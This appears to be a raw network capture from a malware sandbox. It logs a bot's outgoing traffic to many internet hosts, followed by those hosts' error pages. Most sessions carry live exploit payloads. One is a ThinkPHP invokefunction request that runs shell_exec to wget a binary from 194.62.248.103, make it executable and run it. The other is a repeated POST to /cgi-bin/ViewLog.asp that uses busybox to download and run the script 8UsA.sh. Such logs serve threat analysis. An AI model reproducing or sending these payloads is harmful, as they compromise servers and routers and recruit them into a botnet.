                                                        Apr 14, 2024 16:35:07.612448931 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:07.978965044 CEST483INHTTP/1.1 400 Bad Request
                                                        Server: kngx/1.10.2
                                                        Date: Sun, 14 Apr 2024 14:35:07 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 172
                                                        Connection: close
                                                        KS-Deny-Reason: client|81.181.54.60|cdnhuizun06-cache05.cdnhuizun06.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                        x-link-via: huizun06:80;
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        69192.168.2.2358496112.92.61.2880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:07.613899946 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:07.982878923 CEST483INHTTP/1.1 400 Bad Request
                                                        Server: kngx/1.10.2
                                                        Date: Sun, 14 Apr 2024 14:35:07 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 172
                                                        Connection: close
                                                        KS-Deny-Reason: client|81.181.54.60|cdnhuizun06-cache04.cdnhuizun06.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                        x-link-via: huizun06:80;
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        70192.168.2.2356954112.196.108.16380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:07.676645041 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:09.828233957 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:10.252068996 CEST1005INHTTP/1.0 404 Not Found
                                                        Server: SonicWALL
                                                        Expires: -1
                                                        Cache-Control: no-cache
                                                        Content-type: text/html;charset=UTF-8
                                                        X-Content-Type-Options: nosniff
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 73 70 61 6e 2e 75 72 6c 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 7d 70 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 73 70 61 6e 2e 73 65 72 76 65 72 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 72 6c 22 3e 26 23 78 32 46 3b 69 6e 64 65 78 2e 70 68 70 3f 73 3d 26 23 78 32 46 3b 69 6e 64 65 78 26 23 78 32 46 3b 09 68 69 6e 6b 07 70 70 26 23 78 32 46 3b 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 26 23 78 32 37 3b 77 67 65 74 3c 2f 73 70 61 6e 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 70 3e 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 32 3e 3c 70 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 72 76 65 72 22 3e 53 6f 6e 69 63 57 61 6c 6c 20 53 65 72 76 65 72 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>File not found!</title><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; }span.url { text-decoration: underline; }p {margin-left: 3em;}span.server {font-size: smaller;}/*...*/--></style></head><body><h1>File not found!</h1><p>The requested URL <span class="url">&#x2F;index.php?s=&#x2F;index&#x2F;hinkpp&#x2F;invokefunction&amp;function=call_user_func_array&amp;vars[0]=shell_exec&amp;vars[1][]=&#x27;wget</span> was not found on this server.</p><p>If you entered the URL manually please check your spelling and try again.</p><h2>Error 404</h2><p><span class="server">SonicWall Server</span></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        71192.168.2.2358506112.92.61.2880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:07.712605000 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:08.087476969 CEST483INHTTP/1.1 400 Bad Request
                                                        Server: kngx/1.10.2
                                                        Date: Sun, 14 Apr 2024 14:35:07 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 172
                                                        Connection: close
                                                        KS-Deny-Reason: client|81.181.54.60|cdnhuizun06-cache03.cdnhuizun06.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                        x-link-via: huizun06:80;
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        72192.168.2.233683694.12.162.928080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:07.963987112 CEST303INHTTP/1.1 400 Bad Request
                                                        Server: sky_router
                                                        X-Frame-Options: Deny
                                                        Cache-Control: no-cache
                                                        Date: Sun, 14 Apr 2024 14:35:07 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        73192.168.2.233912894.123.45.1518080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:08.092801094 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        74192.168.2.235034295.164.243.188080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:08.311777115 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:08.533090115 CEST1260INHTTP/1.1 400 Bad Request
                                                        Server: squid/3.5.27
                                                        Mime-Version: 1.0
                                                        Date: Sun, 14 Apr 2024 14:35:08 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3556
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Vary: Accept-Language
                                                        Content-Language: en
                                                        X-Cache: MISS from ubuntu
                                                        X-Cache-Lookup: NONE from ubuntu:8080
                                                        Via: 1.1 ubuntu (squid/3.5.27)
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        75192.168.2.234471031.136.108.2178080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:08.408135891 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:09.380354881 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:11.300052881 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:15.139584064 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:22.818624973 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:38.176512003 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:08.636073112 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        76192.168.2.233708094.123.118.168080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:08.429121971 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        77192.168.2.233401085.209.138.1878080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:08.429295063 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:08.765513897 CEST1289INHTTP/1.0 400 Bad Request
                                                        Server: squid/3.1.23
                                                        Mime-Version: 1.0
                                                        Date: Sun, 14 Apr 2024 14:07:50 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 3167
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Connection: close
